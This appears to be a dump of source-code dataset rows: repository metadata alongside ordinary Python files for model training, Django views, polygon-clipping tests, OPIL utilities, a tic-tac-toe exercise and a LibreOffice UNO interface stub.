hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
25c80db82d1ebad170680349cd93672e15412051 | 1,342 | py | Python | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 162 | 2019-04-05T02:05:45.000Z | 2022-01-15T02:16:59.000Z | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 16 | 2019-05-11T15:38:25.000Z | 2020-08-12T13:15:45.000Z | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 22 | 2019-04-20T14:37:51.000Z | 2022-03-21T05:58:17.000Z | import torch
import utility
import data
import model
import loss
from option import args
from trainer import Trainer
def print_network(net):
    """Print a model's layout followed by its total trainable-parameter count."""
    total_params = sum(p.numel() for p in net.parameters())
    print(net)
    print('Total number of parameters: %d' % total_params)
def print_setting(net, args):
    """Print the network architecture and the full training configuration.

    :param net: the model whose structure and parameter count are shown
    :param args: parsed command-line options (see ``option.args``)
    """
    print('init this train:')
    # Show the network layout and its parameter count first.
    print_network(net)
    print('training model:', args.model)
    print('scale:', args.scale)
    print('resume from ', args.resume)
    print('output patch size', args.patch_size)
    # Architecture hyper-parameters.
    print('model setting: n_resblocks:', args.n_resblocks,
          'n_feats:', args.n_feats, 'block_feats:', args.block_feats)
    # Optimization hyper-parameters.
    print('optimization setting: ', args.optimizer)
    print('total epochs:', args.epochs)
    print('lr:', args.lr, 'lr_decay at:', args.decay_type, 'decay gamma:', args.gamma)
    print('train loss:', args.loss)
    print('save_name:', args.save)
# Seed the RNG so a run is reproducible for a given --seed.
torch.manual_seed(args.seed)
checkpoint = utility.checkpoint(args)
if checkpoint.ok:
    loader = data.Data(args)
    # NOTE: these assignments shadow the imported ``model`` and ``loss``
    # modules; the modules are no longer reachable below this point.
    model = model.Model(args, checkpoint)
    print_setting(model, args)
    # No loss function is needed when only evaluating.
    loss = loss.Loss(args, checkpoint) if not args.test_only else None
    t = Trainer(args, loader, model, loss, checkpoint)
    # Alternate training and evaluation until the trainer signals completion.
    while not t.terminate():
        t.train()
        t.test()
    checkpoint.done()
| 27.958333 | 87 | 0.671386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 258 | 0.19225 |
25c81eb343b1d3a48857d65ac0f1c63ee02f3d87 | 710 | py | Python | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | from rest_framework.views import APIView
from rest_framework.response import Response
from auth_API.helpers import get_or_create_user_information
class CheckConnection(APIView):
    """Endpoint reporting whether the user's Mycroft session is connected."""

    def post(self, request, format=None):
        """Return the Mycroft connection flag and session id for this user."""
        # Look up (or lazily create) the Daphne user record for this session.
        info = get_or_create_user_information(request.session, request.user, 'EOSS')
        status = info.mycroft_connection
        session_id = info.mycroft_session
        print('--> CHECKING MYCROFT CONNECTIONS:', session_id, status)
        # Only an explicit False counts as disconnected, matching the
        # original ``is False`` identity check.
        if status is False:
            return Response({"connection": "false", "access_token": session_id})
        return Response({"connection": "true"})
| 29.583333 | 89 | 0.7 | 557 | 0.784507 | 0 | 0 | 0 | 0 | 0 | 0 | 129 | 0.18169 |
25c905966ddc0f0df2e0e38de7498ec35dea8707 | 2,295 | py | Python | examples/machine_learning.py | miroslavftn/Text-classification | 3fa627606fdd5fbfde5ec118441fd24088ad7137 | [
"Apache-2.0"
] | 2 | 2019-05-17T02:39:12.000Z | 2020-07-15T09:35:04.000Z | examples/machine_learning.py | miroslavftn/Text-classification | 3fa627606fdd5fbfde5ec118441fd24088ad7137 | [
"Apache-2.0"
] | null | null | null | examples/machine_learning.py | miroslavftn/Text-classification | 3fa627606fdd5fbfde5ec118441fd24088ad7137 | [
"Apache-2.0"
] | null | null | null |
from models.statistical.ml_classifier import MLClassifier
from models.statistical.models import ModelsFactory
from models.statistical.tokenizer import TokenizerFactory
# can be loaded from a config file
# Settings shared by both the training and prediction entry points below.
model_name = 'xgb'           # key passed to ModelsFactory.from_name
tokenizer_name = 'default'   # key passed to TokenizerFactory.from_name
ngrams = 2                   # n-gram order handed to the classifier
name = 'sst2'                # run/dataset name
stopwords = False            # stop-word flag handed to the classifier
max_features = 5000          # vocabulary size cap
test_size = 0.2              # held-out fraction
model = ModelsFactory.from_name(model_name)  # init model
tokenizer = TokenizerFactory.from_name(tokenizer_name)  # init tokenizer
def predict_ml_classifier(text, plot=False):
    """
    Predict label from input text
    :param text: input text
    :param plot: show important words
    :return: predicted value
    """
    # The classifier is built without any training corpus here: it is only
    # used for inference, so input/output data are left empty.
    settings = dict(input_data=None,
                    output_data=None,
                    model=model,
                    tokenizer=tokenizer,
                    stop_words=stopwords,
                    ngram=ngrams,
                    max_features=max_features,
                    test_size=test_size,
                    name=name)
    classifier = MLClassifier(**settings)
    predictions = classifier.predict([text], plot=plot)
    return predictions[0]
def train_ml_classifier(input_data, output_data):
    """
    Train a classifier
    :param input_data: input documents
    :param output_data: labels
    :return:
    """
    classifier = MLClassifier(
        input_data=input_data,
        output_data=output_data,
        model=model,
        tokenizer=tokenizer,
        stop_words=stopwords,
        ngram=ngrams,
        max_features=max_features,
        test_size=test_size,
        name=name,
    )
    # Fit on the raw class distribution (no resampling of the training set).
    classifier.train(resampling=False)
if __name__ == '__main__':
    import pandas as pd
    from configs import SST2_DIR
    # Load the SST-2 training split (tab-separated file with 'sentence'
    # and 'label' columns).
    df = pd.read_csv(SST2_DIR + '/train.tsv', delimiter='\t')
    input_data = df['sentence']
    output_data = df['label']
    print('Training ML classifier')
train_ml_classifier(input_data, output_data) | 34.253731 | 72 | 0.533769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 416 | 0.181264 |
25cbeb75700cfc7ba35658909719975df140adca | 6,215 | py | Python | tests/test_algorithms/test_sutherland_hodgman.py | Huite/numba_celltree | f6562153fb09468c64c6594b5ed4c48ce827997a | [
"MIT"
] | 2 | 2021-08-30T08:44:45.000Z | 2021-08-30T11:55:25.000Z | tests/test_algorithms/test_sutherland_hodgman.py | Deltares/numba_celltree | 898c54a18731e56407d03636f7f18e67d84a1f00 | [
"MIT"
] | null | null | null | tests/test_algorithms/test_sutherland_hodgman.py | Deltares/numba_celltree | 898c54a18731e56407d03636f7f18e67d84a1f00 | [
"MIT"
] | null | null | null | """"
Test data generated with:
```python
import numpy as np
import shapely.geometry as sg
def ccw(a):
# Ensure triangles are counter-clockwise
for i in range(len(a)):
t = a[i]
normal = (t[1][0] - t[0][0])*(t[2][1]-t[0][1])-(t[1][1]-t[0][1])*(t[2][0]-t[0][0])
if normal < 0:
a[i] = t[::-1]
def area_of_intersection(a, b):
ntriangles = a.shape[0]
out = np.empty(ntriangles, dtype=np.float64)
for i in range(ntriangles):
aa = sg.Polygon(a[i])
bb = sg.Polygon(b[i])
out[i] = aa.intersection(bb).area
return out
a = np.random.rand(10, 3, 2)
b = np.random.rand(10, 3, 2)
ccw(a)
ccw(b)
expected = area_of_intersection(a, b)
```
"""
import numpy as np
from numba_celltree.algorithms.sutherland_hodgman import (
area_of_intersection,
box_area_of_intersection,
intersection,
polygon_polygon_clip_area,
)
from numba_celltree.constants import FloatDType, Point, Vector
# Ten random triangles (counter-clockwise, see the module docstring) used
# as the first operand of each clip-area pair.
A = np.array(
    [
        [[0.98599114, 0.16203056], [0.64839124, 0.6552714], [0.44528724, 0.88567472]],
        [[0.96182162, 0.3642742], [0.03478739, 0.54268026], [0.57582971, 0.41541277]],
        [[0.32556365, 0.03800701], [0.74000686, 0.04684465], [0.89527188, 0.55061165]],
        [[0.2988294, 0.96608896], [0.01212383, 0.00144037], [0.75113002, 0.54797261]],
        [[0.06522962, 0.43735202], [0.791499, 0.5229509], [0.40651803, 0.94317979]],
        [[0.06544202, 0.16735701], [0.67916353, 0.95843272], [0.33545733, 0.86368003]],
        [[0.43129575, 0.27998206], [0.49468229, 0.75438255], [0.01542992, 0.80696797]],
        [[0.29449023, 0.32433138], [0.46157048, 0.22492393], [0.82442969, 0.75853821]],
        [[0.66113797, 0.88485505], [0.70164374, 0.24393423], [0.89565423, 0.89407158]],
        [[0.92226655, 0.82771688], [0.42243438, 0.17562404], [0.82885357, 0.17541439]],
    ],
)
# Ten random triangles used as the second operand of each pair.
B = np.array(
    [
        [[0.8141854, 0.06821897], [0.37086004, 0.49067617], [0.79810508, 0.07873283]],
        [[0.74948185, 0.8942076], [0.59654411, 0.87755533], [0.3023107, 0.68256513]],
        [[0.46670989, 0.31716127], [0.68408985, 0.75792215], [0.41437824, 0.79509823]],
        [[0.60715923, 0.67648133], [0.40045464, 0.79676831], [0.06332723, 0.69679141]],
        [[0.24057248, 0.16433727], [0.58871277, 0.05499277], [0.59144784, 0.24476056]],
        [[0.23183198, 0.41619006], [0.66566902, 0.30110111], [0.60418791, 0.60702136]],
        [[0.09393344, 0.87976118], [0.994083, 0.00532686], [0.95176396, 0.79836557]],
        [[0.89063751, 0.5880825], [0.03881315, 0.82436939], [0.61391092, 0.45027842]],
        [[0.63168954, 0.75135847], [0.8726944, 0.06387274], [0.89585471, 0.92837592]],
        [[0.94379596, 0.64164962], [0.95787609, 0.65627618], [0.6212529, 0.89153053]],
    ]
)
# Intersection area of A[i] with B[i], computed with shapely (see the
# generation snippet in the module docstring).
EXPECTED = np.array(
    [
        0.0,
        0.0,
        0.0,
        0.0262324,
        0.0,
        0.00038042,
        0.03629781,
        0.01677156,
        0.05417924,
        0.00108787,
    ]
)
def test_intersection():
    """One crossing case and one parallel (no-intersection) case."""
    origin = Point(0.0, 0.0)
    direction = Vector(1.0, 1.0)
    r = Point(1.0, 0.0)
    s = Point(0.0, 1.0)
    edge = Vector(s.x - r.x, s.y - r.y)
    # Edge normal (perpendicular to the segment r->s).
    normal = Vector(-edge.y, edge.x)
    ok, hit = intersection(origin, direction, r, normal)
    assert ok
    assert np.allclose(hit, [0.5, 0.5])
    # A segment parallel to the ray must report no intersection.
    s = Point(2.0, 1.0)
    edge = Vector(s.x - r.x, s.y - r.y)
    normal = Vector(-edge.y, edge.x)
    ok, hit = intersection(origin, direction, r, normal)
    assert not ok
def test_clip_area():
    """Clip areas of the random triangle pairs match shapely's answers."""
    for i in range(len(EXPECTED)):
        assert np.allclose(polygon_polygon_clip_area(A[i], B[i]), EXPECTED[i])
def test_clip_area_no_overlap():
    """Disjoint triangles must have zero intersection area."""
    triangle = np.array(
        [
            [0.0, 0.0],
            [1.0, 0.0],
            [1.0, 1.0],
        ]
    )
    # Translate a copy far enough away that the triangles cannot touch.
    shifted = triangle + 2.0
    assert np.allclose(polygon_polygon_clip_area(triangle, shifted), 0)
def test_clip_area_repeated_vertex():
    """Repeated vertices in a polygon must not break the clipping."""
    a = np.array(
        [
            [0.0, 0.0],
            [1.0, 0.0],
            [1.0, 0.0],  # repeated vertex
            [1.0, 1.0],
        ]
    )
    # No overlap
    b = a.copy()
    b += 2.0
    actual = polygon_polygon_clip_area(a, b)
    assert np.allclose(actual, 0)
    b = np.array(
        [
            [0.0, 0.0],
            [1.0, 0.0],
            [0.0, 1.0],
            [0.0, 1.0],  # repeated vertex
        ]
    )
    actual = polygon_polygon_clip_area(a, b)
    # Fix: the result was previously computed but never checked. The overlap
    # of triangles {(0,0),(1,0),(1,1)} and {(0,0),(1,0),(0,1)} is the
    # triangle {(0,0),(1,0),(0.5,0.5)}, whose area is 0.25.
    assert np.allclose(actual, 0.25)
def test_clip_area_epsilon():
    """Triangles perturbed by one machine epsilon still give the exact area."""
    eps = np.finfo(FloatDType).eps
    triangle = np.array(
        [
            [-1.0, -1.0],
            [1.0, -1.0],
            [1.0, 1.0],
        ]
    )
    # Check a slightly inflated and a slightly deflated copy.
    for offset in (eps, -eps):
        perturbed = np.array(
            [
                [-1.0 - offset, -1.0 - offset],
                [1.0 + offset, -1.0 - offset],
                [1.0 + offset, 1.0 + offset],
            ]
        )
        assert np.allclose(polygon_polygon_clip_area(triangle, perturbed), 2.0)
def test_area_of_intersection():
    """The face-pair areas from the mesh API match the per-triangle values."""
    vertices_a = A.reshape(-1, 2)
    vertices_b = B.reshape(-1, 2)
    faces_a = np.arange(len(vertices_a)).reshape(-1, 3)
    faces_b = np.arange(len(vertices_b)).reshape(-1, 3)
    indices_a = np.arange(len(faces_a))
    # Fix: indices_b was derived from len(faces_a). Harmless while both
    # meshes have the same number of faces, but wrong in intent.
    indices_b = np.arange(len(faces_b))
    actual = area_of_intersection(
        vertices_a, vertices_b, faces_a, faces_b, indices_a, indices_b
    )
    assert np.allclose(actual, EXPECTED)
def test_box_area_of_intersection():
    """Box/face clipping: each face overlaps box 0 by 0.5 and box 1 not at all."""
    # Two axis-aligned boxes given as (xmin, xmax, ymin, ymax).
    box_coords = np.array(
        [
            [0.0, 1.0, 0.0, 1.0],
            [1.0, 2.0, 1.0, 2.0],
        ]
    )
    vertices = np.array(
        [
            [0.0, 0.0],
            [2.0, 0.0],
            [2.0, 2.0],
            [-2.0, 0.0],
            [-2.0, 2.0],
        ]
    )
    # Face 0 lies in the right half-plane, face 1 in the left half-plane.
    faces = np.array(
        [
            [0, 1, 2],
            [0, 3, 4],
        ]
    )
    # Test every (box, face) combination.
    indices_bbox = np.array([0, 0, 1, 1])
    indices_face = np.array([0, 1, 0, 1])
    actual = box_area_of_intersection(
        box_coords,
        vertices,
        faces,
        indices_bbox,
        indices_face,
    )
    assert np.allclose(actual, [0.5, 0.0, 0.5, 0.0])
| 26.559829 | 90 | 0.524698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 774 | 0.124537 |
25cd4e9ba282e597a4fa5b69cbe92a7a0be65817 | 155 | py | Python | interpreter/application.py | Jesssullivan/MerlinAI-Interpreters | e2e053f357a74d642b160b42a1276fa44c45614b | [
"Unlicense"
] | 3 | 2019-02-23T03:19:32.000Z | 2020-02-12T13:54:02.000Z | interpreter/application.py | Jesssullivan/MerlinAI-Interpreters | e2e053f357a74d642b160b42a1276fa44c45614b | [
"Unlicense"
] | null | null | null | interpreter/application.py | Jesssullivan/MerlinAI-Interpreters | e2e053f357a74d642b160b42a1276fa44c45614b | [
"Unlicense"
] | null | null | null |
from app.main import create_app
from waitress import serve
if __name__ == "__main__":
app = create_app()
serve(app, host='0.0.0.0', port='5000')
| 19.375 | 43 | 0.677419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.16129 |
25ce6b3af033822b4efc267bfa22d834752ae174 | 2,575 | py | Python | source/194-Vencedor_do_jogo_da_velha.py | FelixLuciano/DesSoft-2020.2 | a44063d63778329f1e1266881f20f7954ecb528b | [
"MIT"
] | null | null | null | source/194-Vencedor_do_jogo_da_velha.py | FelixLuciano/DesSoft-2020.2 | a44063d63778329f1e1266881f20f7954ecb528b | [
"MIT"
] | null | null | null | source/194-Vencedor_do_jogo_da_velha.py | FelixLuciano/DesSoft-2020.2 | a44063d63778329f1e1266881f20f7954ecb528b | [
"MIT"
] | null | null | null | # Vencedor do jogo da velha
# Faça uma função que recebe um tabuleiro de jogo da velha e devolve o vencedor. O tabuleiro é representado por uma lista de listas como o mostrado a seguir:
# [['X', 'O', 'X'], ['.', 'O', 'X'], ['O', '.', 'X']]
# Note que a lista acima é idêntica a:
# [
# ['X', 'O', 'X'],
# ['.', 'O', 'X'],
# ['O', '.', 'X']
# ]
# Os jogadores são representados pelas letras maiúsculas 'X' e 'O'. Espaços em branco são representados pelo caractere '.'. Para vencer no jogo da velha, um jogador deve marcar todas as casas de uma mesma coluna, linha ou diagonal. No exemplo acima o 'X' é o vencedor, assim a função deve retornar o valor 'X', caso o 'O' seja o vencedor a função deve retornar 'O'. Caso não haja vencedor, a sua função deve retornar 'V'.
# Alguns exemplos:
# - Sua função deve retornar 'O' para as seguintes entradas:
# [
# ['X', 'O', 'O'],
# ['.', 'O', 'X'],
# ['O', '.', 'X']
# ]
# [
# ['X', '.', 'X'],
# ['O', 'O', 'O'],
# ['.', 'O', 'X']
# ]
# - Sua função deve retornar 'V' para o exemplo a seguir:
# [
# ['X', '.', 'X'],
# ['X', 'O', 'O'],
# ['O', 'X', 'O']
# ]
# O nome da sua função deve ser 'verifica_jogo_da_velha'.
def verifica_linha (character, line):
return all([letter == character for letter in line])
def verifica_jogo_da_velha (table):
# Itera cada letra
for character in ("X", "O"):
# Itera linhas do tabuleiro
for line in table:
# Verifica se alguma linha está preenchida somente com uma letra
if verifica_linha(character, line):
return character
# Itera colunas do tabuleiro
for column_i in range(len(table[0])):
# Extrai coluna da tabela
column = [line[column_i] for line in table]
# Verifica se alguma coluna está preenchida somente com uma letra
if verifica_linha(character, column):
return character
# Extrai diagonais da tabela
diagonal_1 = [line[i] for i, line in enumerate(table)]
diagonal_2 = [line[-i-1] for i, line in enumerate(table)]
# Verifica se alguma diagonal está preenchida somente com uma letra
if verifica_linha(character, diagonal_1) or verifica_linha(character, diagonal_2):
return character
# Retorna velha se nenhuma condição for satisfeita
return "V"
# Feedback do professor:
# "Solução muito elegante. Parabéns!"
| 39.015152 | 421 | 0.573204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,730 | 0.663598 |
25d13fa91e8a27a8e3e83ce1553d500555f00fd0 | 99 | py | Python | src/boat/reservierung/apps.py | holytortoise/boat_project | b318cc46034c8e87cfa2db29fda7b6ea08a7745a | [
"MIT"
] | null | null | null | src/boat/reservierung/apps.py | holytortoise/boat_project | b318cc46034c8e87cfa2db29fda7b6ea08a7745a | [
"MIT"
] | null | null | null | src/boat/reservierung/apps.py | holytortoise/boat_project | b318cc46034c8e87cfa2db29fda7b6ea08a7745a | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class ReservierungConfig(AppConfig):
    """Django app configuration for the ``reservierung`` (reservation) app."""

    # Dotted-path label Django uses to identify the application.
    name = 'reservierung'
| 16.5 | 36 | 0.777778 | 62 | 0.626263 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | 0.141414 |
25d2427f17acf99c0e015181ad76ec8cf75b6f09 | 1,065 | py | Python | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | import martian
from martian.error import GrokError
from grokcore.component import name as namedirective
from zope import component
from bst.pygasus.datamanager.model import ExtBaseModel
from bst.pygasus.datamanager.interfaces import IModelTransformer
from bst.pygasus.datamanager.transformer import ModelTransfomerUtility
class schema(martian.Directive):
    """Martian class directive declaring the interface used to build a model."""

    # Applies at class level, may be set only once, and has no default,
    # so grokking fails loudly when the directive is missing.
    scope = martian.CLASS
    store = martian.ONCE
    default = None
class ExtModelGrokker(martian.ClassGrokker):
    """Grok ``ExtBaseModel`` subclasses and register a transformer utility.

    For each grokked model class, a ``ModelTransfomerUtility`` is built from
    the class and its ``schema`` directive and registered as a named
    ``IModelTransformer`` utility in the global site manager.
    """

    martian.component(ExtBaseModel)
    martian.directive(schema)
    martian.directive(namedirective)

    def execute(self, class_, schema, name, **kw):
        """Register the model's transformer; raise if no schema was given."""
        if schema is None:
            # Fix: the message was previously built with a backslash line
            # continuation inside the string literal, which embedded the
            # next source line's indentation whitespace into the error text
            # (and read "a Interface").
            raise GrokError('Class %s is missing directive "schema". '
                            'Need an Interface to create the model.' % class_,
                            class_)
        if not name:
            # Fall back to the class name when no name directive was set.
            name = class_.__name__
        gsm = component.getGlobalSiteManager()
        transformer = ModelTransfomerUtility(class_, schema)
        gsm.registerUtility(transformer, IModelTransformer, name)
        return True
| 31.323529 | 86 | 0.721127 | 736 | 0.69108 | 0 | 0 | 0 | 0 | 0 | 0 | 109 | 0.102347 |
25d28a94c243549378bccac5503509c7d698f1cd | 4,833 | py | Python | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | 3 | 2020-07-09T19:52:58.000Z | 2020-08-05T18:05:54.000Z | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | 293 | 2020-06-19T18:51:27.000Z | 2021-09-17T20:42:41.000Z | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | null | null | null | """
Provides a list of functions for building opil objects.
"""
from intent_parser.intent.measure_property_intent import MeasuredUnit
from intent_parser.intent_parser_exceptions import IntentParserException
import intent_parser.utils.sbol3_utils as sbol3_utils
import intent_parser.table.cell_parser as cell_parser
import intent_parser.constants.intent_parser_constants as ip_constants
import opil
import tyto
def create_opil_boolean_parameter_value(value: bool):
    """Wrap a Python bool in an ``opil.BooleanValue``."""
    parameter_value = opil.BooleanValue()
    parameter_value.value = value
    return parameter_value
def create_opil_enumerated_parameter_value(value: str):
    """Wrap a string in an ``opil.EnumeratedValue``."""
    parameter_value = opil.EnumeratedValue()
    parameter_value.value = value
    return parameter_value
def create_opil_integer_parameter_value(value: int):
    """Wrap an int in an ``opil.IntegerValue``."""
    parameter_value = opil.IntegerValue()
    parameter_value.value = value
    return parameter_value
def create_opil_measurement_parameter_value(value: float, unit=''):
    """Wrap a numeric value (with an optional unit) in an ``opil.MeasureValue``."""
    result = opil.MeasureValue()
    # MeasuredUnit handles the value/unit pairing and the opil conversion.
    result.has_measure = MeasuredUnit(value, unit).to_opil_measure()
    return result
def create_opil_string_parameter_value(value: str):
    """Wrap a string in an ``opil.StringValue``."""
    parameter_value = opil.StringValue()
    parameter_value.value = value
    return parameter_value
def create_opil_URI_parameter_value(value: str):
    """Wrap a URI string in an ``opil.URIValue``."""
    parameter_value = opil.URIValue()
    parameter_value.value = value
    return parameter_value
def create_parameter_value_from_parameter(opil_parameter, parameter_value):
    """Convert ``parameter_value`` into the opil value type matching the
    type of ``opil_parameter``.

    Raises IntentParserException when a measurement string does not parse to
    exactly one value/unit pair. NOTE(review): falls through and returns
    None implicitly for parameter types not handled below -- presumably
    unreachable; confirm with callers.
    """
    if isinstance(opil_parameter, opil.BooleanParameter):
        return create_opil_boolean_parameter_value(bool(parameter_value))
    elif isinstance(opil_parameter, opil.EnumeratedParameter):
        return create_opil_enumerated_parameter_value(str(parameter_value))
    elif isinstance(opil_parameter, opil.IntegerParameter):
        return create_opil_integer_parameter_value(int(parameter_value))
    elif isinstance(opil_parameter, opil.MeasureParameter):
        # A bare number becomes a dimensionless measure (tyto.OM.number).
        if cell_parser.PARSER.is_number(str(parameter_value)):
            return create_opil_measurement_parameter_value(parameter_value, tyto.OM.number)
        # Otherwise parse "value unit" against the fluid and time unit maps.
        possible_units = list(ip_constants.FLUID_UNIT_MAP.keys()) + list(ip_constants.TIME_UNIT_MAP.keys())
        measured_units = cell_parser.PARSER.process_values_unit(parameter_value,
                                                               units=possible_units,
                                                               unit_type='fluid')
        if len(measured_units) != 1:
            raise IntentParserException('Expecting one Measurement Parameter value but %d were found.' % len(measured_units))
        return create_opil_measurement_parameter_value(float(measured_units[0].get_value()),
                                                       measured_units[0].get_unit())
    elif isinstance(opil_parameter, opil.StringParameter):
        return create_opil_string_parameter_value(str(parameter_value))
    elif isinstance(opil_parameter, opil.URIParameter):
        return create_opil_URI_parameter_value(str(parameter_value))
def get_param_value_as_string(parameter_value):
    """Render an opil parameter-value object as a display string.

    Unknown value types (and MeasureValues without a measure) fall through
    to the empty string. NOTE(review): exact-type checks (``type(...) is``)
    are used throughout, so subclasses of the opil value types will not
    match -- presumably intentional.
    """
    if type(parameter_value) is opil.BooleanValue:
        return str(parameter_value.value)
    elif type(parameter_value) is opil.EnumeratedValue:
        return str(parameter_value.value)
    elif type(parameter_value) is opil.IntegerValue:
        return str(parameter_value.value)
    elif type(parameter_value) is opil.MeasureValue:
        if parameter_value.has_measure:
            measure_number = float(parameter_value.has_measure.value)
            measure_unit = sbol3_utils.get_unit_name_from_uri(parameter_value.has_measure.unit)
            if measure_unit:
                if measure_unit == tyto.OM.number:
                    # Dimensionless quantity: show the value alone.
                    return str(measure_number)
                else:
                    # "value unit", e.g. "5.0 microliter".
                    return str(measure_number) + ' ' + measure_unit
            return str(measure_number)
    elif type(parameter_value) is opil.StringValue:
        # An empty string is rendered as one space.
        return parameter_value.value if parameter_value.value else ' '
    elif type(parameter_value) is opil.URIValue:
        return str(parameter_value.value)
    elif isinstance(parameter_value, str):
        return parameter_value
    return ''
def fix_nonunique_parameter_names(doc):
    """Disambiguate objects in *doc* that share the same display name.

    Every object whose name collides with another object's name is renamed
    to ``name (description)(display_id)`` so that names become unique.
    """
    # Collect every named object in the document.
    named_objects = doc.find_all(lambda obj: bool(obj.name))
    # Group the named objects by their current name.
    by_name = {}
    for obj in named_objects:
        by_name.setdefault(obj.name, []).append(obj)
    # Qualify the names in every group with more than one member.
    for group in by_name.values():
        if len(group) > 1:
            for obj in group:
                obj.name = f'{obj.name} ({obj.description})({obj.display_id})'
| 43.540541 | 125 | 0.723774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 304 | 0.062901 |
25d3f23269643ac6a6edc73c74d7612fd5227b4e | 6,741 | py | Python | ooobuild/lo/ucb/x_simple_file_access.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | ooobuild/lo/ucb/x_simple_file_access.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | ooobuild/lo/ucb/x_simple_file_access.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Interface Class
# this is a auto generated file generated by Cheetah
# Libre Office Version: 7.3
# Namespace: com.sun.star.ucb
import typing
from abc import abstractmethod
from ..uno.x_interface import XInterface as XInterface_8f010a43
if typing.TYPE_CHECKING:
from ..io.x_input_stream import XInputStream as XInputStream_98d40ab4
from ..io.x_output_stream import XOutputStream as XOutputStream_a4e00b35
from ..io.x_stream import XStream as XStream_678908a4
from ..task.x_interaction_handler import XInteractionHandler as XInteractionHandler_bf80e51
from ..util.date_time import DateTime as DateTime_84de09d3
class XSimpleFileAccess(XInterface_8f010a43):
"""
This is the basic interface to read data from a stream.
See Also:
`API XSimpleFileAccess <https://api.libreoffice.org/docs/idl/ref/interfacecom_1_1sun_1_1star_1_1ucb_1_1XSimpleFileAccess.html>`_
"""
__ooo_ns__: str = 'com.sun.star.ucb'
__ooo_full_ns__: str = 'com.sun.star.ucb.XSimpleFileAccess'
__ooo_type_name__: str = 'interface'
__pyunointerface__: str = 'com.sun.star.ucb.XSimpleFileAccess'
@abstractmethod
def copy(self, SourceURL: str, DestURL: str) -> None:
"""
Copies a file.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def createFolder(self, NewFolderURL: str) -> None:
"""
Creates a new Folder.
Raises:
